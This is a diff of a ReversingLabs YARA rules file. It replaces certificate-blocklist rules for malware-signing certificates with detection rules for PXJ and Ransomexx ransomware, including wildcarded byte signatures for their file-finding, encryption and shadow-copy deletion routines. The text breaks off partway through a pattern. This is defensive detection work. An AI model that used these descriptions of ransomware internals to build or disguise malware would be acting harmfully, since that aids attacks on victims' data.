+		description = "Yara rule that detects PXJ ransomware."
 		author = "ReversingLabs"
-		id = "763d4faf-19af-5349-a643-4773055df47a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c1549905-5b31-55c0-a275-0ab8133b3504"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2690-L2708"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "35552242f9f0a56b45e30e6f376877446f33e24690ff5d7b03dc776fab178afd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.PXJ.yara#L1-L158"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e88d27dcd7ad3af459bd7e34fcc827822365441446b0e4e7bbec399c9a948cb7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "PXJ"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 68 ?? ?? ?? ??
+            33 F6 8D 8D ?? ?? ?? ?? 33 C0 56 51 89 9D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
+            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 53 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B
+            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ??
+            3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66
+        }
+		$find_files_p2 = {
+            3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB
+            ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 9F ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF
+            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
+            ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
+            85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3A C1 75 ?? 01 8F ?? ?? ?? ?? 11
+            B7 ?? ?? ?? ?? EB ?? 01 8F ?? ?? ?? ?? 11 B7 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B 4D ?? 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 89 85 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4D
+            ?? 8B 55 ?? 51 52 E8 ?? ?? ?? ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 53 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 51 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 33 F6 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ??
+            46 83 FE ?? 7C ?? 8D 55 ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 6A ?? 51
+        }
+		$encrypt_files_p2 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 95
+            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 56
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            8B 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50
+            56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
+            8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D
+            95 ?? ?? ?? ?? 52 56 FF D7 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ??
+            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 8B 9D
+            ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 D2 52 52 52 33 C9 51 50
+            FF 15 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B C6 8D
+        }
+		$encrypt_files_p3 = {
+            48 ?? 8B FF 66 8B 10 83 C0 ?? 66 85 D2 75 ?? 2B C1 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51
+            8D 14 00 8B 83 ?? ?? ?? ?? 52 56 50 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
+            51 6A ?? 68 ?? ?? ?? ?? 52 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ??
+            8D 4D ?? 51 52 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ??
+            ?? 51 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50
+            51 FF D7 8B B5 ?? ?? ?? ?? 6A ?? 33 C9 51 51 B8 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ??
+            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 83 C4 ?? 52 FF 15 ?? ?? ?? ?? 33 C9 51 51 33 C0 51 50 8B 83 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$delete_volumes_snapshots_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 33 FF 57 57 89
+            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 57 68 ??
+            ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF
+            D6 57 57 8D 8D ?? ?? ?? ?? 51 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ??
+            6A ?? 57 57 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F
+            84 ?? ?? ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ??
+            ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 33 FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D 9B ?? ?? ?? ?? 8A 08 40 84
+            C9 75 ?? 2B C2 57 8D 95 ?? ?? ?? ?? 52 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ??
+            ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 88 0E E8 ?? ?? ?? ?? 8D B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ??
+            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF
+            15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8B FF 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
+        }
+		$delete_volumes_snapshots_p2 = {
+            EB ?? 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? EB ?? 8D 64 24 ?? 8B BD ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
+            CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A
+            ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 9F ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 33
+            FF 57 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72
+            ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 89 B5 ??
+            ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 8C ?? ?? ?? ?? EB ?? 57
+            8D 9F ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Helpful Technologies, Inc" and ( pe.signatures [ i ] . serial == "00:83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" or pe.signatures [ i ] . serial == "83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" ) and 1407715199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $delete_volumes_snapshots_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F385E765Acfb95605C9B35Ca4C32F80E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ransomexx : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ransomexx ransomware."
 		author = "ReversingLabs"
-		id = "865f8daf-35c4-5437-9c97-9b9fc48d7d70"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "5e62660d-2696-56c7-9322-fed6ce9d36ff"
+		date = "2020-11-26"
+		modified = "2020-11-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2710-L2728"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c73c8f1913d3423a52f5e77751813460ae9200eb3cb1cc6e2ec30f37f0da8152"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ransomexx.yara#L1-L147"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "27b4132b7f16cafc40687e96a552ce59cc24ebf7679575680f170e3beee8a0a9"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ransomexx"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CWI SOFTWARE LTDA" and ( pe.signatures [ i ] . serial == "00:f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" or pe.signatures [ i ] . serial == "f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" ) and 1382313599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_F62C9C4Efc81Caf0D5A2608009D48018 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "176434ae-7162-5b35-91f7-888536250884"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2730-L2748"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "08fcff795297c0608b1a1d71465279cbf76d4dff06de2a2262a58debbb2f9e0d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B F4 B3 ?? 85 F6 74 ?? C6 46 ?? ?? B0 ?? 66 C7 06 ?? ?? 88 5E ?? 88
+            46 ?? 8B C7 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8B C6 8D 78 ?? 8A 08 40 84
+            C9 75 ?? 2B C7 8D 84 10 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ??
+            ?? 8B F0 89 75 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C3 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 89 45 ?? 85 C0 74 ?? C6 40 ?? ?? 88 18 88
+            58 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 49 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
+            ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A
+        }
+		$find_files_p2 = {
+            51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B C7 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 70 ??
+            8D 64 24 ?? 8A 08 40 84 C9 75 ?? 8B 1D ?? ?? ?? ?? 2B C6 8D 94 10 ?? ?? ?? ?? 52 6A
+            ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
+            ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 6A ?? 56 FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 6A ??
+            FF D3 50 FF 15 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$find_files_p3 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B C7
+            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D B4 00 ?? ?? ?? ?? 8D 86
+            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ??
+            ?? ?? 56 57 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 4C 24 ??
+            51 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8B 3D ?? ?? ?? ?? FF D7 83 F8 ??
+            0F 84 ?? ?? ?? ?? FF D7 E9 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
+            4D ?? 56 51 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 56 8D 94 24
+            ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 66 83 38 ?? 74 ?? 68 ?? ?? ?? ?? 50 FF D7 85 C0 75 ?? FF 05 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 0F 84
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 54 24 ?? 52 FF D7 85 C0 74 ?? 8D 44
+        }
+		$find_files_p4 = {
+            24 ?? 50 8D 4C 24 ?? 51 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B 0D ??
+            ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 54 24 ?? 52 8D 44 24 ?? 50 FF D7 85 C0 74 ??
+            8D 4C 24 ?? 51 8D 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B
+            0D ?? ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 8B 44 24 ?? 0B 44 24 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? 6A ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
